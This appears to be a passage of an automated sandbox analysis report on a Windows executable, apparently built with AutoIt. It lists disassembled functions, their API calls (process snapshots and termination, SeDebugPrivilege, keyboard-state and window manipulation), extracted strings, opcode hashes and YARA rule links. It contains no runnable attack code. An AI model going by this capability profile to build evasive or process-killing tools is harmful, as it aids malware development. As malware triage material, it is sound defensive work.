              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
              • String ID: SeDebugPrivilege
              • API String ID: 2533919879-2896544425
              • Opcode ID: a113764b83badd6d8d7ccc8dffd7bd66d3a5f4dd373e8a4efb2b348a3950ccb6
              • Instruction ID: 2d5076510f2ac23343b7d3232febcbdc6b508e1886fbf137faa63d9ed84abe1f
              • Opcode Fuzzy Hash: a113764b83badd6d8d7ccc8dffd7bd66d3a5f4dd373e8a4efb2b348a3950ccb6
              • Instruction Fuzzy Hash: E761B171204242AFD710DF19C495F65BBE1BF84318F14859CE8568B7A3C7BAEC49CB92
              Function 00763886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00763925
              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0076393A
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00763954
              • _wcslen.LIBCMT ref: 00763999
              • SendMessageW.USER32(?,00001057,00000000,?), ref: 007639C6
              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007639F4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$Window_wcslen
              • String ID: SysListView32
              • API String ID: 2147712094-78025650
              • Opcode ID: 5c7dcfc4952fdc0402e8fbca96f5d5dd2ce03124b1360d96417510374086a4bd
              • Instruction ID: b19383b339d33875891d6c9d52597726938d4ef7b59656340d169247639685a7
              • Opcode Fuzzy Hash: 5c7dcfc4952fdc0402e8fbca96f5d5dd2ce03124b1360d96417510374086a4bd
              • Instruction Fuzzy Hash: 6441D871A00319ABEF219F64CC49FEA77A9EF08354F10016AF955E7281D7B99D80CB94
              Function 006F2D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
              Download Yara Rule
              APIs
              • _ValidateLocalCookies.LIBCMT ref: 006F2D4B
              • ___except_validate_context_record.LIBVCRUNTIME ref: 006F2D53
              • _ValidateLocalCookies.LIBCMT ref: 006F2DE1
              • __IsNonwritableInCurrentImage.LIBCMT ref: 006F2E0C
              • _ValidateLocalCookies.LIBCMT ref: 006F2E61
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
              • String ID: &Ho$csm
              • API String ID: 1170836740-2077702024
              • Opcode ID: f6a94c6f19235291afb56e7521eb9cc2da098255eacefc04e7aa7ffc6c5fd22d
              • Instruction ID: f703c9eea8bb3f9fb39bf99ab3fd6a378596394a0355c0b63e31ddac373f0123
              • Opcode Fuzzy Hash: f6a94c6f19235291afb56e7521eb9cc2da098255eacefc04e7aa7ffc6c5fd22d
              • Instruction Fuzzy Hash: F141A434A0021EABCF10DF68C855AEEBBB6BF45354F148155EA14AB392D7359A11CFD0
              Function 0073C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
              Download Yara Rule
              APIs
              • LoadIconW.USER32(00000000,00007F03), ref: 0073C913
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: IconLoad
              • String ID: blank$info$question$stop$warning
              • API String ID: 2457776203-404129466
              • Opcode ID: 08e135b5ef8f20f1f7049caa3c0956f4cb09f55a839453ff335c4f3606bd45b9
              • Instruction ID: 7719464671d4327051e223bf23474e459e5ed616b19606c50cd7e6a43706e579
              • Opcode Fuzzy Hash: 08e135b5ef8f20f1f7049caa3c0956f4cb09f55a839453ff335c4f3606bd45b9
              • Instruction Fuzzy Hash: D511EB3268930ABEBB029B55AC82DAB779CDF15754F11006EF500B6183EBAD7F005368
              Function 0073ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$LocalTime
              • String ID:
              • API String ID: 952045576-0
              • Opcode ID: e4b8644315091cb30925ac25193e0e5a6c09641022a926cd9cf728660350de70
              • Instruction ID: 953233d71ce4e2f53a67f8cd337d2b747e19839fe56707d770a17ad22f643e5b
              • Opcode Fuzzy Hash: e4b8644315091cb30925ac25193e0e5a6c09641022a926cd9cf728660350de70
              • Instruction Fuzzy Hash: 9D41B065D1021C75DB51EBB4C88A9DFB3AAAF45700F40846AF618E3162FB38E345C3E9
              Function 006EF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
              Download Yara Rule
              APIs
              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0072682C,00000004,00000000,00000000), ref: 006EF953
              • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0072682C,00000004,00000000,00000000), ref: 0072F3D1
              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0072682C,00000004,00000000,00000000), ref: 0072F454
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ShowWindow
              • String ID:
              • API String ID: 1268545403-0
              • Opcode ID: 184ced469cb754abed815b45902d6965275a994cd9434f4cb57d7512b3803563
              • Instruction ID: 062bb6544e084ecf765a34ef74093c6220656b5b4e65e697ae4fde4e97b97505
              • Opcode Fuzzy Hash: 184ced469cb754abed815b45902d6965275a994cd9434f4cb57d7512b3803563
              • Instruction Fuzzy Hash: 8F412A302197C0BBC7399B2AD88877A7BA3AB46310F15843DF0C757663C679A881CB51
              Function 00762D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
              Download Yara Rule
              APIs
              • DeleteObject.GDI32(00000000), ref: 00762D1B
              • GetDC.USER32(00000000), ref: 00762D23
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00762D2E
              • ReleaseDC.USER32(00000000,00000000), ref: 00762D3A
              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00762D76
              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00762D87
              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00765A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00762DC2
              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00762DE1
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
              • String ID:
              • API String ID: 3864802216-0
              • Opcode ID: 2eca772ffb24327bd19ee26f9e20a0da3daa88bd3f8c08ae26a0a95bf0d7b13c
              • Instruction ID: e59e62a9a3103ee56d2bdecc53e4818e11792e9de70ddbf83036de619ca0352e
              • Opcode Fuzzy Hash: 2eca772ffb24327bd19ee26f9e20a0da3daa88bd3f8c08ae26a0a95bf0d7b13c
              • Instruction Fuzzy Hash: F5319172201614BFEB154F50CC49FFB3BADEF09715F044055FE499A192C6B99C41CBA8
              Function 00735622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: f8a383b01382925de88b3a6bec6e558427d412a982814cdc32fd625fbda12b39
              • Instruction ID: a3821fdb972465b6239d3089ef810889410c7ee1e6a05f45d263ee81356c419d
              • Opcode Fuzzy Hash: f8a383b01382925de88b3a6bec6e558427d412a982814cdc32fd625fbda12b39
              • Instruction Fuzzy Hash: C92195F2644A19F7F21456209D93FBA235EAF217C4F840024FE059A586FB28ED10C2E9
              Function 00754FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: NULL Pointer assignment$Not an Object type
              • API String ID: 0-572801152
              • Opcode ID: 0206b068c864b8d7565c498dfc70fded65e408cacdcee672a5c53d027b7a3521
              • Instruction ID: c35b2652cbaf4d0dc1c6a0f84f1a077113bc1f6baf5f659c0d7a13d13f336851
              • Opcode Fuzzy Hash: 0206b068c864b8d7565c498dfc70fded65e408cacdcee672a5c53d027b7a3521
              • Instruction Fuzzy Hash: 7ED1D671A0060A9FDF10CFA8C891BEEB7B5BF48354F148069ED15AB281E7B4DD49CB90
              Function 00711522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
              Download Yara Rule
              APIs
              • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,007117FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 007115CE
              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,007117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00711651
              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,007117FB,?,007117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007116E4
              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,007117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007116FB
                • Part of subcall function 00703820: RtlAllocateHeap.NTDLL(00000000,?,007A1444,?,006EFDF5,?,?,006DA976,00000010,007A1440,006D13FC,?,006D13C6,?,006D1129), ref: 00703852
              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,007117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00711777
              • __freea.LIBCMT ref: 007117A2
              • __freea.LIBCMT ref: 007117AE
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
              • String ID:
              • API String ID: 2829977744-0
              • Opcode ID: aab147aaecb947bb0a71e2b8c7b8681f88a8f495e400caf70a91402220c61039
              • Instruction ID: d2d2d582cccc64d57dd6f074ab0d7af80b43fb83db76196ec2c143f09337c0c8
              • Opcode Fuzzy Hash: aab147aaecb947bb0a71e2b8c7b8681f88a8f495e400caf70a91402220c61039
              • Instruction Fuzzy Hash: 6191A571E102169ADB218E78CC45AEE7BB69F49710F984659EA01EF2C1DB3DDD80C760
              Function 00754523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Variant$ClearInit
              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
              • API String ID: 2610073882-625585964
              • Opcode ID: 21829483e59f466644a3dd483689a630f67c9efc7a972e4032658ac6fefdda41
              • Instruction ID: 4312fbc68a478a746e81e2f87e755001f8efa236fbb38830d26e8f835f4e9a57
              • Opcode Fuzzy Hash: 21829483e59f466644a3dd483689a630f67c9efc7a972e4032658ac6fefdda41
              • Instruction Fuzzy Hash: EE91A471A00219ABDF24CFA5CC44FEE7BB8EF45715F108559F905AB280D7B89989CFA0
              Function 00741187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
              Download Yara Rule
              APIs
              • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0074125C
              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00741284
              • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 007412A8
              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007412D8
              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0074135F
              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007413C4
              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00741430
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ArraySafe$Data$Access$UnaccessVartype
              • String ID:
              • API String ID: 2550207440-0
              • Opcode ID: 6574b68f10876c1e48cb1dd31a85b3af0d2b2be96a3f76e1d94924ba27f77129
              • Instruction ID: a2317020f907cf3f7b95684436d4509797e82e16ea7a1fde8206d1cb2cd6df47
              • Opcode Fuzzy Hash: 6574b68f10876c1e48cb1dd31a85b3af0d2b2be96a3f76e1d94924ba27f77129
              • Instruction Fuzzy Hash: D391F475A00219DFDB01EF98C884BBE77B5FF44324F548029EA51EB291D7BCA981CB94
              Function 006E948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ObjectSelect$BeginCreatePath
              • String ID:
              • API String ID: 3225163088-0
              • Opcode ID: 16c06dcb0ebd52a45c32db97c2e5b955270900eabe12ec971a41447f058989b0
              • Instruction ID: 19f580b0c245ad83f8e8d802c037397c12a892cf10e1bf49b0ef69849a9c9685
              • Opcode Fuzzy Hash: 16c06dcb0ebd52a45c32db97c2e5b955270900eabe12ec971a41447f058989b0
              • Instruction Fuzzy Hash: AA914671D01259EFCB15CFAACC84AEEBBB9FF48320F148049E516B7251D378A942CB60
              Function 00753947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
              Download Yara Rule
              APIs
              • VariantInit.OLEAUT32(?), ref: 0075396B
              • CharUpperBuffW.USER32(?,?), ref: 00753A7A
              • _wcslen.LIBCMT ref: 00753A8A
              • VariantClear.OLEAUT32(?), ref: 00753C1F
                • Part of subcall function 00740CDF: VariantInit.OLEAUT32(00000000), ref: 00740D1F
                • Part of subcall function 00740CDF: VariantCopy.OLEAUT32(?,?), ref: 00740D28
                • Part of subcall function 00740CDF: VariantClear.OLEAUT32(?), ref: 00740D34
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
              • String ID: AUTOIT.ERROR$Incorrect Parameter format
              • API String ID: 4137639002-1221869570
              • Opcode ID: a7cbad24f4df9ae44887431e5a47fd727101c57ee977313d44e3ca3931166d54
              • Instruction ID: 5d284730851b6570eed9cfbeeef0dfbfff5b826238345ecd082dbe18555951bd
              • Opcode Fuzzy Hash: a7cbad24f4df9ae44887431e5a47fd727101c57ee977313d44e3ca3931166d54
              • Instruction Fuzzy Hash: B491AE746083059FC704DF24C48086AB7E5FF88355F04892EF8899B361DB75EE09CB92
              Function 00754BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0073000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?,?,?,0073035E), ref: 0073002B
                • Part of subcall function 0073000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?,?), ref: 00730046
                • Part of subcall function 0073000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?,?), ref: 00730054
                • Part of subcall function 0073000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0072FF41,80070057,?), ref: 00730064
              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00754C51
              • _wcslen.LIBCMT ref: 00754D59
              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00754DCF
              • CoTaskMemFree.OLE32(?), ref: 00754DDA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
              • String ID: NULL Pointer assignment
              • API String ID: 614568839-2785691316
              • Opcode ID: 8b1c8e9490ddc2d60c37645ed2d40e2a8827f06902028f16f7fc78fa5ab2ac12
              • Instruction ID: d78b41c4609d6784e53fbdf8502645fcea7b105df21da408e2e9b59d9c0b5954
              • Opcode Fuzzy Hash: 8b1c8e9490ddc2d60c37645ed2d40e2a8827f06902028f16f7fc78fa5ab2ac12
              • Instruction Fuzzy Hash: F1912671D0021DEFDF14DFA4D891AEEB7B9BF08314F10856AE915A7241DB749A48CFA0
              Function 007620FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
              Download Yara Rule
              APIs
              • GetMenu.USER32(?), ref: 00762183
              • GetMenuItemCount.USER32(00000000), ref: 007621B5
              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007621DD
              • _wcslen.LIBCMT ref: 00762213
              • GetMenuItemID.USER32(?,?), ref: 0076224D
              • GetSubMenu.USER32(?,?), ref: 0076225B
                • Part of subcall function 00733A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00733A57
                • Part of subcall function 00733A3D: GetCurrentThreadId.KERNEL32 ref: 00733A5E
                • Part of subcall function 00733A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007325B3), ref: 00733A65
              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007622E3
                • Part of subcall function 0073E97B: Sleep.KERNEL32 ref: 0073E9F3
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
              • String ID:
              • API String ID: 4196846111-0
              • Opcode ID: b72c2e56e178b1f1b04402a5caa4a7c07b2482b6431fa0ce05d3c06c5d9eb137
              • Instruction ID: efdd7c7be3d1e1bba6bee4cdc73c57dc5c410da23ee467c2bff943000afaf806
              • Opcode Fuzzy Hash: b72c2e56e178b1f1b04402a5caa4a7c07b2482b6431fa0ce05d3c06c5d9eb137
              • Instruction Fuzzy Hash: 02719F35E00605AFCB54DF64C845AAEB7F6FF88320F158459E817EB352DB78AD428B90
              Function 0073AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
              Download Yara Rule
              APIs
              • GetParent.USER32(?), ref: 0073AEF9
              • GetKeyboardState.USER32(?), ref: 0073AF0E
              • SetKeyboardState.USER32(?), ref: 0073AF6F
              • PostMessageW.USER32(?,00000101,00000010,?), ref: 0073AF9D
              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0073AFBC
              • PostMessageW.USER32(?,00000101,00000012,?), ref: 0073AFFD
              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0073B020
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
